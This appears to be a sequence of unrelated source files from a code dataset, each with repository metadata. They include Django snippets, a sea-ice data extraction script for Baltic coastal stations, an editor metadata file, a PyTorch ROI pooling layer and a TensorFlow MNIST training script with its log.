('code', models.CharField(max_length=10, unique=True)),
('name', models.CharField(max_length=255)),
],
),
migrations.RunPython(seed_database)
]
| [
"migueln6@gmail.com"
] | migueln6@gmail.com |
bd6d1d5a395d1a59e39358b8164d34d56dbcb1cb | 82e78f606f8c203cb77b1e3e8fd3b13158f31af8 | /thenewboston/transactions/validation.py | 8612d11da9a8ba93fe0d80accb79bbd627413987 | [
"MIT"
] | permissive | rajat4665/thenewboston-python | 1f0b8aea02fb8dbfb2eea60cd1ef07ac12fad667 | df842c793fe7bfd8731fd8746abf25747c9e569e | refs/heads/master | 2022-11-26T00:46:54.848608 | 2020-07-26T00:12:06 | 2020-07-26T00:12:06 | 283,263,021 | 0 | 0 | MIT | 2020-07-28T16:07:08 | 2020-07-28T16:07:07 | null | UTF-8 | Python | false | false | 403 | py | def validate_transaction_exists(*, amount, error, recipient, txs):
"""
Check for the existence of a Tx
"""
tx = next((tx for tx in txs if tx.get('amount') == amount and tx.get('recipient') == recipient), None)
if not tx:
raise error({
'error_message': 'Tx not found',
'expected_amount': amount,
'expected_recipient': recipient
})
| [
"buckyroberts@gmail.com"
] | buckyroberts@gmail.com |
4220d040287852ff2cb51884d1f88a13f9e80009 | af9268e1ead8cdb491868c14a2240d9e44fb3b56 | /last-minute-env/lib/python2.7/site-packages/django/contrib/admin/templatetags/admin_static.py | 62b8691f9c135756c86c3975ad0fb508ab08de89 | [] | no_license | frosqh/Cousinade2017 | d5154c24c93ca8089eeba26b53c594e92cb6bd82 | c34d5707af02402bf2bb7405eddc91297da399ff | refs/heads/master | 2021-01-20T07:57:34.586476 | 2017-10-22T18:42:45 | 2017-10-22T18:42:45 | 90,074,802 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 315 | py | from django.template import Library
from django.templatetags.static import static as _static
register = Library()
@register.simple_tag
def static(path):
# Backwards compatibility alias for django.templatetags.static.static().
# Deprecation should start in Django 2.0.
return _static(path)
| [
"frosqh@gmail.com"
] | frosqh@gmail.com |
ff74e48bde7614a0015fb731371ce9c36ee3cf1f | 194848d309f1b5ea1e7749d3560d99f9aa158431 | /sea_ice/scripts/Ice_data_stations.py | fd462e081d21a680b99789843e60ea0c66e0fcf3 | [] | no_license | siirias/nemo_analysis | 967d7012a1b963e46290b7d83a7d23293f0d168c | d20181750406445a259c2c0de02f5c1eabd51d0d | refs/heads/master | 2023-03-16T08:16:21.595165 | 2023-03-09T16:17:45 | 2023-03-09T16:17:45 | 177,143,292 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,666 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 18 09:54:54 2020
@author: oikkonea
"""
# This script extracts sea ice data (concetration, volume) for coastal stations.
# Daily data is saved in txt files for further analysis and plotting
# Stations: Kemi, Oulu (Saapaskari), Kalajoki, Kylmäpihlaja and Sälgrund
from __future__ import division
import matplotlib.pyplot as plt
import numpy as np
import netCDF4 as nc
import datetime as dt
from smartseahelper import smh
ss=smh()
reftime=dt.datetime(1950,1,1)
#Kemi
obs_lat = 65.72
obs_lon = 24.43
with open("ice_seasons/Ice_season_Kemi_D005.txt", "w") as a_file:
for i in range(2006,2060):
year=i
print year
#data=nc.Dataset('run_data/NORDIC-GOB_1d_{:}0101_{:}1231_grid_T.nc'.format(year,year))
data=nc.Dataset('run_data/SS-GOB_1d_{:}0101_{:}1231_grid_T.nc'.format(year,year))
lons = data.variables['nav_lon'][:]
lats = data.variables['nav_lat'][:]
abslat = np.abs(lats-obs_lat)
abslon= np.abs(lons-obs_lon)
c = np.maximum(abslon,abslat)
latlon_idx = np.argmin(c)
x, y = np.where(c == np.min(c))
vol=data.variables['icevolume'][:,:,:]
conc = data.variables['icecon'][:,:,:]
vol_Kemi=vol[:,x,y]
conc_Kemi=conc[:,x,y]
for j in range(len(vol_Kemi)):
a_file.write("\n")
a_file.write("{:},{:},{:},{:}".format(year,j,conc_Kemi[j][0],vol_Kemi[j][0]))
#saapaskari (oulu)
obs_lat = 65.05
obs_lon = 25.17
with open("ice_seasons/Ice_season_Saapaskari_D005.txt", "w") as a_file:
for i in range(2006,2060):
year=i
print year
# data=nc.Dataset('run_data/NORDIC-GOB_1d_{:}0101_{:}1231_grid_T.nc'.format(year,year))
data=nc.Dataset('run_data/SS-GOB_1d_{:}0101_{:}1231_grid_T.nc'.format(year,year))
lons = data.variables['nav_lon'][:]
lats = data.variables['nav_lat'][:]
abslat = np.abs(lats-obs_lat)
abslon= np.abs(lons-obs_lon)
c = np.maximum(abslon,abslat)
latlon_idx = np.argmin(c)
x, y = np.where(c == np.min(c))
vol=data.variables['icevolume'][:,:,:]
conc = data.variables['icecon'][:,:,:]
vol_Saapaskari=vol[:,x,y]
conc_Saapaskari=conc[:,x,y]
for j in range(len(vol_Saapaskari)):
a_file.write("\n")
a_file.write("{:},{:},{:},{:}".format(year,j,conc_Saapaskari[j][0],vol_Saapaskari[j][0]))
#Kalajoki
obs_lat = 64.29
obs_lon = 23.89
with open("ice_seasons/Ice_season_Kalajoki_D005.txt", "w") as out_file:
    for year in range(2006, 2060):
        print(year)
        # data=nc.Dataset('run_data/NORDIC-GOB_1d_{:}0101_{:}1231_grid_T.nc'.format(year,year))
        dataset = nc.Dataset('run_data/SS-GOB_1d_{:}0101_{:}1231_grid_T.nc'.format(year, year))
        grid_lons = dataset.variables['nav_lon'][:]
        grid_lats = dataset.variables['nav_lat'][:]
        # Chebyshev distance (max of |dlon|, |dlat|); its minimum marks the
        # grid cell closest to the station.
        dist = np.maximum(np.abs(grid_lons - obs_lon), np.abs(grid_lats - obs_lat))
        latlon_idx = np.argmin(dist)  # flat index of the nearest cell (kept; unused below)
        x, y = np.where(dist == np.min(dist))
        vol_Kalajoki = dataset.variables['icevolume'][:, :, :][:, x, y]
        conc_Kalajoki = dataset.variables['icecon'][:, :, :][:, x, y]
        # One CSV line per day: year, day index, ice concentration, ice volume.
        for day in range(len(vol_Kalajoki)):
            out_file.write("\n")
            out_file.write("{:},{:},{:},{:}".format(year, day, conc_Kalajoki[day][0], vol_Kalajoki[day][0]))
#Kylmäpihlaja
obs_lat = 61.14
obs_lon = 21.31
with open("ice_seasons/Ice_season_Kylmapihlaja_D005.txt", "w") as out_file:
    for year in range(2006, 2060):
        print(year)
        # data=nc.Dataset('run_data/NORDIC-GOB_1d_{:}0101_{:}1231_grid_T.nc'.format(year,year))
        dataset = nc.Dataset('run_data/SS-GOB_1d_{:}0101_{:}1231_grid_T.nc'.format(year, year))
        grid_lons = dataset.variables['nav_lon'][:]
        grid_lats = dataset.variables['nav_lat'][:]
        # Chebyshev distance (max of |dlon|, |dlat|); its minimum marks the
        # grid cell closest to the station.
        dist = np.maximum(np.abs(grid_lons - obs_lon), np.abs(grid_lats - obs_lat))
        latlon_idx = np.argmin(dist)  # flat index of the nearest cell (kept; unused below)
        x, y = np.where(dist == np.min(dist))
        vol_Kylmapihlaja = dataset.variables['icevolume'][:, :, :][:, x, y]
        conc_Kylmapihlaja = dataset.variables['icecon'][:, :, :][:, x, y]
        # One CSV line per day: year, day index, ice concentration, ice volume.
        for day in range(len(vol_Kylmapihlaja)):
            out_file.write("\n")
            out_file.write("{:},{:},{:},{:}".format(year, day, conc_Kylmapihlaja[day][0], vol_Kylmapihlaja[day][0]))
#Sälgrund
obs_lat = 62.33
obs_lon = 21.21
with open("ice_seasons/Ice_season_Salgrund_D005.txt", "w") as a_file:
    # BUG FIX: this loop previously read `range(1980,20092006,2060)` -- a typo
    # that merged two edits -- so it started at 1980 and stepped 2060 years at
    # a time, pointing at model files that do not exist.  Every other station
    # in this script extracts model years 2006-2059, so Sälgrund now does too.
    for i in range(2006, 2060):
        year = i
        print(year)
        # data=nc.Dataset('run_data/NORDIC-GOB_1d_{:}0101_{:}1231_grid_T.nc'.format(year,year))
        data = nc.Dataset('run_data/SS-GOB_1d_{:}0101_{:}1231_grid_T.nc'.format(year, year))
        lons = data.variables['nav_lon'][:]
        lats = data.variables['nav_lat'][:]
        # Nearest grid cell: minimum Chebyshev distance to the station.
        abslat = np.abs(lats - obs_lat)
        abslon = np.abs(lons - obs_lon)
        c = np.maximum(abslon, abslat)
        latlon_idx = np.argmin(c)  # flat index of the nearest cell (unused below)
        x, y = np.where(c == np.min(c))
        vol = data.variables['icevolume'][:, :, :]
        conc = data.variables['icecon'][:, :, :]
        vol_Salgrund = vol[:, x, y]
        conc_Salgrund = conc[:, x, y]
        # One CSV line per day: year, day index, ice concentration, ice volume.
        for j in range(len(vol_Salgrund)):
            a_file.write("\n")
            a_file.write("{:},{:},{:},{:}".format(year, j, conc_Salgrund[j][0], vol_Salgrund[j][0]))
| [
"simo.siiria@fmi.fi"
] | simo.siiria@fmi.fi |
24053881224fa4eeef0ad6eded09146927976cc0 | 5b3d8f56f4d18dc8809f9f5aa7d2a7089cdbf489 | /.c9/metadata/workspace/FrequenciesMain/PMchecksSPINT.py | 3fc1d903ca16a8e76e8844d6096538a62339ba3c | [] | no_license | heyliljill/edpsych-cloned | 89ba1a827ed66651b7387b25bc2c188ff344e8d1 | ba02e4789e390bb6488b11608b994ee5678a4b30 | refs/heads/master | 2020-07-26T00:51:41.004018 | 2019-09-14T17:26:45 | 2019-09-14T17:26:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,118 | py | {"filter":false,"title":"PMchecksSPINT.py","tooltip":"/FrequenciesMain/PMchecksSPINT.py","undoManager":{"mark":18,"position":18,"stack":[[{"start":{"row":2,"column":18},"end":{"row":2,"column":19},"action":"insert","lines":["S"],"id":2}],[{"start":{"row":2,"column":19},"end":{"row":2,"column":20},"action":"insert","lines":["P"],"id":3}],[{"start":{"row":2,"column":20},"end":{"row":2,"column":21},"action":"insert","lines":["I"],"id":4}],[{"start":{"row":2,"column":21},"end":{"row":2,"column":22},"action":"insert","lines":["N"],"id":5}],[{"start":{"row":2,"column":22},"end":{"row":2,"column":23},"action":"insert","lines":["T"],"id":6}],[{"start":{"row":6,"column":0},"end":{"row":7,"column":0},"action":"insert","lines":["",""],"id":7}],[{"start":{"row":7,"column":0},"end":{"row":8,"column":0},"action":"insert","lines":["",""],"id":8}],[{"start":{"row":8,"column":0},"end":{"row":19,"column":4},"action":"insert","lines":["for i in range(0,2):"," ## SELECT HIGH INTEREST ## "," filtersign = [\"~=\",\"=\"]"," if mathread == \"m\":"," spint = \"mathspint\""," elif mathread == \"r\":"," spint = \"readspint\""," "," filterText = \"\"\"USE ALL. \\nCOMPUTE filter_$=(\"\"\"+spint+filtersign[i]+ \"2\"+\"\"\"). \\nVARIABLE LABELS filter_$ '\"\"\" + spint+filtersign[i]+ \"2\" +\"\"\"(FILTER)'. \\nVALUE LABELS filter_$ 0 'Not Selected' 1 'Selected'. \\nFORMATS filter_$ (f1.0). \\nFILTER BY filter_$. 
\\nEXECUTE.\\n\\n\"\"\""," "," f.write(filterText)"," "],"id":9}],[{"start":{"row":19,"column":0},"end":{"row":19,"column":4},"action":"insert","lines":[" "],"id":10},{"start":{"row":20,"column":0},"end":{"row":20,"column":4},"action":"insert","lines":[" "]},{"start":{"row":21,"column":0},"end":{"row":21,"column":4},"action":"insert","lines":[" "]},{"start":{"row":22,"column":0},"end":{"row":22,"column":4},"action":"insert","lines":[" "]},{"start":{"row":23,"column":0},"end":{"row":23,"column":4},"action":"insert","lines":[" "]},{"start":{"row":24,"column":0},"end":{"row":24,"column":4},"action":"insert","lines":[" "]},{"start":{"row":25,"column":0},"end":{"row":25,"column":4},"action":"insert","lines":[" "]},{"start":{"row":26,"column":0},"end":{"row":26,"column":4},"action":"insert","lines":[" "]},{"start":{"row":27,"column":0},"end":{"row":27,"column":4},"action":"insert","lines":[" "]},{"start":{"row":28,"column":0},"end":{"row":28,"column":4},"action":"insert","lines":[" "]},{"start":{"row":29,"column":0},"end":{"row":29,"column":4},"action":"insert","lines":[" "]},{"start":{"row":30,"column":0},"end":{"row":30,"column":4},"action":"insert","lines":[" "]},{"start":{"row":31,"column":0},"end":{"row":31,"column":4},"action":"insert","lines":[" "]},{"start":{"row":32,"column":0},"end":{"row":32,"column":4},"action":"insert","lines":[" "]},{"start":{"row":33,"column":0},"end":{"row":33,"column":4},"action":"insert","lines":[" "]},{"start":{"row":34,"column":0},"end":{"row":34,"column":4},"action":"insert","lines":[" "]},{"start":{"row":35,"column":0},"end":{"row":35,"column":4},"action":"insert","lines":[" "]},{"start":{"row":36,"column":0},"end":{"row":36,"column":4},"action":"insert","lines":[" "]},{"start":{"row":37,"column":0},"end":{"row":37,"column":4},"action":"insert","lines":[" "]},{"start":{"row":38,"column":0},"end":{"row":38,"column":4},"action":"insert","lines":[" 
"]},{"start":{"row":39,"column":0},"end":{"row":39,"column":4},"action":"insert","lines":[" "]},{"start":{"row":40,"column":0},"end":{"row":40,"column":4},"action":"insert","lines":[" "]},{"start":{"row":41,"column":0},"end":{"row":41,"column":4},"action":"insert","lines":[" "]},{"start":{"row":42,"column":0},"end":{"row":42,"column":4},"action":"insert","lines":[" "]},{"start":{"row":43,"column":0},"end":{"row":43,"column":4},"action":"insert","lines":[" "]},{"start":{"row":44,"column":0},"end":{"row":44,"column":4},"action":"insert","lines":[" "]},{"start":{"row":45,"column":0},"end":{"row":45,"column":4},"action":"insert","lines":[" "]},{"start":{"row":46,"column":0},"end":{"row":46,"column":4},"action":"insert","lines":[" "]},{"start":{"row":47,"column":0},"end":{"row":47,"column":4},"action":"insert","lines":[" "]},{"start":{"row":48,"column":0},"end":{"row":48,"column":4},"action":"insert","lines":[" "]},{"start":{"row":49,"column":0},"end":{"row":49,"column":4},"action":"insert","lines":[" "]},{"start":{"row":50,"column":0},"end":{"row":50,"column":4},"action":"insert","lines":[" "]},{"start":{"row":51,"column":0},"end":{"row":51,"column":4},"action":"insert","lines":[" "]},{"start":{"row":52,"column":0},"end":{"row":52,"column":4},"action":"insert","lines":[" "]},{"start":{"row":53,"column":0},"end":{"row":53,"column":4},"action":"insert","lines":[" "]},{"start":{"row":54,"column":0},"end":{"row":54,"column":4},"action":"insert","lines":[" "]},{"start":{"row":55,"column":0},"end":{"row":55,"column":4},"action":"insert","lines":[" "]},{"start":{"row":56,"column":0},"end":{"row":56,"column":4},"action":"insert","lines":[" "]},{"start":{"row":57,"column":0},"end":{"row":57,"column":4},"action":"insert","lines":[" "]},{"start":{"row":58,"column":0},"end":{"row":58,"column":4},"action":"insert","lines":[" "]},{"start":{"row":59,"column":0},"end":{"row":59,"column":4},"action":"insert","lines":[" 
"]}],[{"start":{"row":59,"column":62},"end":{"row":60,"column":0},"action":"insert","lines":["",""],"id":11},{"start":{"row":60,"column":0},"end":{"row":60,"column":8},"action":"insert","lines":[" "]}],[{"start":{"row":60,"column":8},"end":{"row":61,"column":0},"action":"insert","lines":["",""],"id":12},{"start":{"row":61,"column":0},"end":{"row":61,"column":8},"action":"insert","lines":[" "]}],[{"start":{"row":61,"column":8},"end":{"row":62,"column":0},"action":"insert","lines":["",""],"id":13},{"start":{"row":62,"column":0},"end":{"row":62,"column":8},"action":"insert","lines":[" "]}],[{"start":{"row":62,"column":4},"end":{"row":62,"column":8},"action":"remove","lines":[" "],"id":14}],[{"start":{"row":62,"column":0},"end":{"row":62,"column":4},"action":"remove","lines":[" "],"id":15}],[{"start":{"row":62,"column":0},"end":{"row":64,"column":12},"action":"insert","lines":["f.write(\"\"\"FILTER OFF.","USE ALL.","EXECUTE.\"\"\")"],"id":16}],[{"start":{"row":7,"column":0},"end":{"row":8,"column":0},"action":"insert","lines":["",""],"id":17}],[{"start":{"row":8,"column":0},"end":{"row":9,"column":0},"action":"insert","lines":["",""],"id":18}],[{"start":{"row":8,"column":0},"end":{"row":8,"column":15},"action":"insert","lines":["mathread == \"m\""],"id":19}],[{"start":{"row":8,"column":10},"end":{"row":8,"column":11},"action":"remove","lines":["="],"id":20}]]},"ace":{"folds":[],"scrolltop":0,"scrollleft":0,"selection":{"start":{"row":8,"column":0},"end":{"row":20,"column":23},"isBackwards":true},"options":{"guessTabSize":true,"useWrapMode":false,"wrapToView":true},"firstLineState":0},"timestamp":1456345978891,"hash":"4ea48e1405f9aea3952e15cbcbc5d2706399170d"} | [
"jillyma@gmail.com"
] | jillyma@gmail.com |
558a6dcac84f11a72034f4701f4143645c0414fd | 63b864deda44120067eff632bbb4969ef56dd573 | /object_detection/fast rcnn/roi.py | f7f8c76fbc257a5e40c8450b8615c8b335e4a852 | [] | no_license | lizhe960118/Deep-Learning | d134592c327decc1db12cbe19d9a1c85a5056086 | 7d2c4f3a0512ce4bd2f86c9f455da9866d16dc3b | refs/heads/master | 2021-10-29T06:15:04.749917 | 2019-07-19T15:27:25 | 2019-07-19T15:27:25 | 152,355,392 | 5 | 2 | null | 2021-10-12T22:19:33 | 2018-10-10T03:06:44 | Jupyter Notebook | UTF-8 | Python | false | false | 1,310 | py | import numpy as np
import torch
import torch.nn as nn
class ROIPool(nn.Module):
    """Region-of-interest max pooling (Fast R-CNN style).

    Crops each ROI out of its feature map and adaptively max-pools the crop
    down to a fixed spatial size.
    """

    def __init__(self, output_size):
        super().__init__()
        # AdaptiveMaxPool2d emits `output_size` spatially regardless of crop size.
        self.maxpool = nn.AdaptiveMaxPool2d(output_size)
        self.size = output_size

    def forward(self, images, rois, roi_idx):
        """Pool every ROI to the configured output size.

        images : (batch, channels, H, W) feature maps
        rois   : (n, 4) boxes [x1, y1, x2, y2], coordinates scaled to [0, 1]
        roi_idx: length-n sequence; roi_idx[k] is the batch index of box k

        Returns an (n, channels, output_size, output_size) tensor.
        """
        height = images.size(2)
        width = images.size(3)
        # Map fractional coordinates to pixel bounds: floor the start and ceil
        # the end so each box covers at least one pixel.
        col_lo = np.floor(rois[:, 0] * width).astype(int)
        row_lo = np.floor(rois[:, 1] * height).astype(int)
        col_hi = np.ceil(rois[:, 2] * width).astype(int)
        row_hi = np.ceil(rois[:, 3] * height).astype(int)
        pooled = []
        for k in range(rois.shape[0]):
            crop = images[roi_idx[k]].unsqueeze(0)[:, :, row_lo[k]:row_hi[k], col_lo[k]:col_hi[k]]
            pooled.append(self.maxpool(crop))
        return torch.cat(pooled, dim=0)
| [
"2957308424@qq.com"
] | 2957308424@qq.com |
ceedc1bc32ee20e37272738dadc016703a5e4cf7 | 7e66af5e484f73de3f237a17d8fa42a8af947b22 | /6_2/mnist_backward.py | 51c7f8cbc384c83f08f7b3a023dc5e2181e7a072 | [] | no_license | yuangezhizao/Tensorflow-Study | 12107c6ef8f058123d590a3a7044a6215c4ab457 | 1316922eec2a99cd13317d83553e0a5f279dcbee | refs/heads/master | 2020-05-01T03:03:37.077435 | 2019-03-24T09:45:00 | 2019-03-24T09:45:00 | 177,236,402 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,083 | py | #!/usr/bin/env/ python3
# -*- coding: utf-8 -*-
"""
:Author: yuangezhizao
:Time: 2019/3/24 0024 11:19
:Site: https://www.yuangezhizao.cn
:Copyright: © 2019 yuangezhizao <root@yuangezhizao.cn>
"""
import os
import mnist_forward
import mnist_generateds # 1
import tensorflow as tf
# Training hyperparameters.
BATCH_SIZE = 200  # examples per gradient step
LEARNING_RATE_BASE = 0.1  # initial learning rate
LEARNING_RATE_DECAY = 0.99  # exponential decay factor (applied per epoch, staircase)
REGULARIZER = 0.0001  # regularisation weight passed to mnist_forward.forward
STEPS = 50000  # total number of training iterations
MOVING_AVERAGE_DECAY = 0.99  # decay for the exponential moving averages of weights
MODEL_SAVE_PATH = './model/'  # checkpoint directory
MODEL_NAME = 'mnist_model'  # checkpoint file prefix
train_num_examples = 60000  # MNIST training-set size; drives the LR decay schedule
def backward():
    """Train the classifier and periodically checkpoint it.

    Builds the forward graph via mnist_forward, minimises cross-entropy plus
    the regularisation terms collected in the 'losses' collection, maintains
    exponential moving averages of the trainable variables, and reads training
    batches from TFRecords through TF1 queue runners.  Resumes from the latest
    checkpoint in MODEL_SAVE_PATH when one exists.
    """
    x = tf.placeholder(tf.float32, [None, mnist_forward.INPUT_NODE])
    y_ = tf.placeholder(tf.float32, [None, mnist_forward.OUTPUT_NODE])
    y = mnist_forward.forward(x, REGULARIZER)
    global_step = tf.Variable(0, trainable=False)
    # Cross-entropy on sparse labels, averaged over the batch, plus the
    # regularisation losses registered by the forward pass.
    ce = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=y, labels=tf.argmax(y_, 1))
    cem = tf.reduce_mean(ce)
    loss = cem + tf.add_n(tf.get_collection('losses'))
    # Learning rate decays once per (approximate) epoch: train_num_examples / BATCH_SIZE steps.
    learning_rate = tf.train.exponential_decay(
        LEARNING_RATE_BASE,
        global_step,
        train_num_examples / BATCH_SIZE,
        LEARNING_RATE_DECAY,
        staircase=True)
    train_step = tf.train.GradientDescentOptimizer(learning_rate).minimize(loss, global_step=global_step)
    # Shadow (moving-average) copies of the weights, refreshed after every step.
    ema = tf.train.ExponentialMovingAverage(MOVING_AVERAGE_DECAY, global_step)
    ema_op = ema.apply(tf.trainable_variables())
    with tf.control_dependencies([train_step, ema_op]):
        train_op = tf.no_op(name='train')
    saver = tf.train.Saver()
    # Queue-based input pipeline producing (image, label) batches from TFRecords.
    img_batch, label_batch = mnist_generateds.get_tfrecord(BATCH_SIZE, isTrain=True)
    with tf.Session() as sess:
        init_op = tf.global_variables_initializer()
        sess.run(init_op)
        # Resume training if a checkpoint already exists.
        ckpt = tf.train.get_checkpoint_state(MODEL_SAVE_PATH)
        if ckpt and ckpt.model_checkpoint_path:
            saver.restore(sess, ckpt.model_checkpoint_path)
        # Queue runners must start after variable init and be stopped and
        # joined before the session closes -- keep this ordering intact.
        coord = tf.train.Coordinator()
        threads = tf.train.start_queue_runners(sess=sess, coord=coord)
        for i in range(STEPS):
            xs, ys = sess.run([img_batch, label_batch])  # pull one batch from the queue
            _, loss_value, step = sess.run([train_op, loss, global_step], feed_dict={x: xs, y_: ys})
            if i % 1000 == 0:
                # Log and checkpoint every 1000 iterations.
                print('After %d training step(s), loss on training batch is %g.' % (step, loss_value))
                saver.save(sess, os.path.join(MODEL_SAVE_PATH, MODEL_NAME), global_step=global_step)
        coord.request_stop()
        coord.join(threads)
def main():
    """Script entry point: run the full training loop."""
    backward()
# Guard so that importing this module does not start training.
if __name__ == '__main__':
    main()
'''
C:\Python37\python.exe D:/yuangezhizao/Documents/PycharmProjects/Tensorflow-Study/6_2/mnist_backward.py
WARNING:tensorflow:From C:\Python37\lib\site-packages\tensorflow\python\framework\op_def_library.py:263: colocate_with (from tensorflow.python.framework.ops) is deprecated and will be removed in a future version.
Instructions for updating:
Colocations handled automatically by placer.
WARNING:tensorflow:From D:\yuangezhizao\Documents\PycharmProjects\Tensorflow-Study\6_2\mnist_generateds.py:62: string_input_producer (from tensorflow.python.training.input) is deprecated and will be removed in a future version.
Instructions for updating:
Queue-based input pipelines have been replaced by `tf.data`. Use `tf.data.Dataset.from_tensor_slices(string_tensor).shuffle(tf.shape(input_tensor, out_type=tf.int64)[0]).repeat(num_epochs)`. If `shuffle=False`, omit the `.shuffle(...)`.
WARNING:tensorflow:From C:\Python37\lib\site-packages\tensorflow\python\training\input.py:278: input_producer (from tensorflow.python.training.input) is deprecated and will be removed in a future version.
Instructions for updating:
Queue-based input pipelines have been replaced by `tf.data`. Use `tf.data.Dataset.from_tensor_slices(input_tensor).shuffle(tf.shape(input_tensor, out_type=tf.int64)[0]).repeat(num_epochs)`. If `shuffle=False`, omit the `.shuffle(...)`.
WARNING:tensorflow:From C:\Python37\lib\site-packages\tensorflow\python\training\input.py:190: limit_epochs (from tensorflow.python.training.input) is deprecated and will be removed in a future version.
Instructions for updating:
Queue-based input pipelines have been replaced by `tf.data`. Use `tf.data.Dataset.from_tensors(tensor).repeat(num_epochs)`.
WARNING:tensorflow:From C:\Python37\lib\site-packages\tensorflow\python\training\input.py:199: QueueRunner.__init__ (from tensorflow.python.training.queue_runner_impl) is deprecated and will be removed in a future version.
Instructions for updating:
To construct input pipelines, use the `tf.data` module.
WARNING:tensorflow:From C:\Python37\lib\site-packages\tensorflow\python\training\input.py:199: add_queue_runner (from tensorflow.python.training.queue_runner_impl) is deprecated and will be removed in a future version.
Instructions for updating:
To construct input pipelines, use the `tf.data` module.
WARNING:tensorflow:From C:\Python37\lib\site-packages\tensorflow\python\training\input.py:202: to_float (from tensorflow.python.ops.math_ops) is deprecated and will be removed in a future version.
Instructions for updating:
Use tf.cast instead.
WARNING:tensorflow:From D:\yuangezhizao\Documents\PycharmProjects\Tensorflow-Study\6_2\mnist_generateds.py:63: TFRecordReader.__init__ (from tensorflow.python.ops.io_ops) is deprecated and will be removed in a future version.
Instructions for updating:
Queue-based input pipelines have been replaced by `tf.data`. Use `tf.data.TFRecordDataset`.
WARNING:tensorflow:From D:\yuangezhizao\Documents\PycharmProjects\Tensorflow-Study\6_2\mnist_generateds.py:87: shuffle_batch (from tensorflow.python.training.input) is deprecated and will be removed in a future version.
Instructions for updating:
Queue-based input pipelines have been replaced by `tf.data`. Use `tf.data.Dataset.shuffle(min_after_dequeue).batch(batch_size)`.
2019-03-24 11:36:34.346111: I tensorflow/core/platform/cpu_feature_guard.cc:141] Your CPU supports instructions that this TensorFlow binary was not compiled to use: AVX2
2019-03-24 11:36:35.103492: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1433] Found device 0 with properties:
name: GeForce GTX 965M major: 5 minor: 2 memoryClockRate(GHz): 0.9495
pciBusID: 0000:01:00.0
totalMemory: 2.00GiB freeMemory: 1.63GiB
2019-03-24 11:36:35.109244: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1512] Adding visible gpu devices: 0
2019-03-24 11:36:35.669899: I tensorflow/core/common_runtime/gpu/gpu_device.cc:984] Device interconnect StreamExecutor with strength 1 edge matrix:
2019-03-24 11:36:35.673115: I tensorflow/core/common_runtime/gpu/gpu_device.cc:990] 0
2019-03-24 11:36:35.675092: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1003] 0: N
2019-03-24 11:36:35.677888: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1115] Created TensorFlow device (/job:localhost/replica:0/task:0/device:GPU:0 with 1372 MB memory) -> physical GPU (device: 0, name: GeForce GTX 965M, pci bus id: 0000:01:00.0, compute capability: 5.2)
WARNING:tensorflow:From D:/yuangezhizao/Documents/PycharmProjects/Tensorflow-Study/6_2/mnist_backward.py:62: start_queue_runners (from tensorflow.python.training.queue_runner_impl) is deprecated and will be removed in a future version.
Instructions for updating:
To construct input pipelines, use the `tf.data` module.
2019-03-24 11:36:36.371376: I tensorflow/stream_executor/dso_loader.cc:152] successfully opened CUDA library cublas64_100.dll locally
After 1 training step(s), loss on training batch is 2.24236.
After 1001 training step(s), loss on training batch is 0.220115.
After 2001 training step(s), loss on training batch is 0.152076.
After 3001 training step(s), loss on training batch is 0.205216.
After 4001 training step(s), loss on training batch is 0.167567.
After 5001 training step(s), loss on training batch is 0.158635.
WARNING:tensorflow:From C:\Python37\lib\site-packages\tensorflow\python\training\saver.py:966: remove_checkpoint (from tensorflow.python.training.checkpoint_management) is deprecated and will be removed in a future version.
Instructions for updating:
Use standard file APIs to delete files with this prefix.
After 6001 training step(s), loss on training batch is 0.210692.
After 7001 training step(s), loss on training batch is 0.171899.
After 8001 training step(s), loss on training batch is 0.158845.
After 9001 training step(s), loss on training batch is 0.196471.
After 10001 training step(s), loss on training batch is 0.180448.
After 11001 training step(s), loss on training batch is 0.14437.
After 12001 training step(s), loss on training batch is 0.178022.
After 13001 training step(s), loss on training batch is 0.185863.
After 14001 training step(s), loss on training batch is 0.138782.
After 15001 training step(s), loss on training batch is 0.191732.
After 16001 training step(s), loss on training batch is 0.168763.
After 17001 training step(s), loss on training batch is 0.141043.
After 18001 training step(s), loss on training batch is 0.159804.
After 19001 training step(s), loss on training batch is 0.149362.
After 20001 training step(s), loss on training batch is 0.130862.
After 21001 training step(s), loss on training batch is 0.160967.
After 22001 training step(s), loss on training batch is 0.159692.
After 23001 training step(s), loss on training batch is 0.139557.
After 24001 training step(s), loss on training batch is 0.153192.
After 25001 training step(s), loss on training batch is 0.159082.
After 26001 training step(s), loss on training batch is 0.135244.
After 27001 training step(s), loss on training batch is 0.165513.
After 28001 training step(s), loss on training batch is 0.162942.
After 29001 training step(s), loss on training batch is 0.142064.
After 30001 training step(s), loss on training batch is 0.155545.
After 31001 training step(s), loss on training batch is 0.13796.
After 32001 training step(s), loss on training batch is 0.125994.
After 33001 training step(s), loss on training batch is 0.140172.
After 34001 training step(s), loss on training batch is 0.143543.
After 35001 training step(s), loss on training batch is 0.122421.
After 36001 training step(s), loss on training batch is 0.143754.
After 37001 training step(s), loss on training batch is 0.173271.
After 38001 training step(s), loss on training batch is 0.133238.
After 39001 training step(s), loss on training batch is 0.130665.
After 40001 training step(s), loss on training batch is 0.134306.
After 41001 training step(s), loss on training batch is 0.135702.
After 42001 training step(s), loss on training batch is 0.126434.
After 43001 training step(s), loss on training batch is 0.155796.
After 44001 training step(s), loss on training batch is 0.124808.
After 45001 training step(s), loss on training batch is 0.131072.
After 46001 training step(s), loss on training batch is 0.135592.
After 47001 training step(s), loss on training batch is 0.117375.
After 48001 training step(s), loss on training batch is 0.120023.
After 49001 training step(s), loss on training batch is 0.15125.
Process finished with exit code 0
'''
| [
"root@yuangezhizao.cn"
] | root@yuangezhizao.cn |
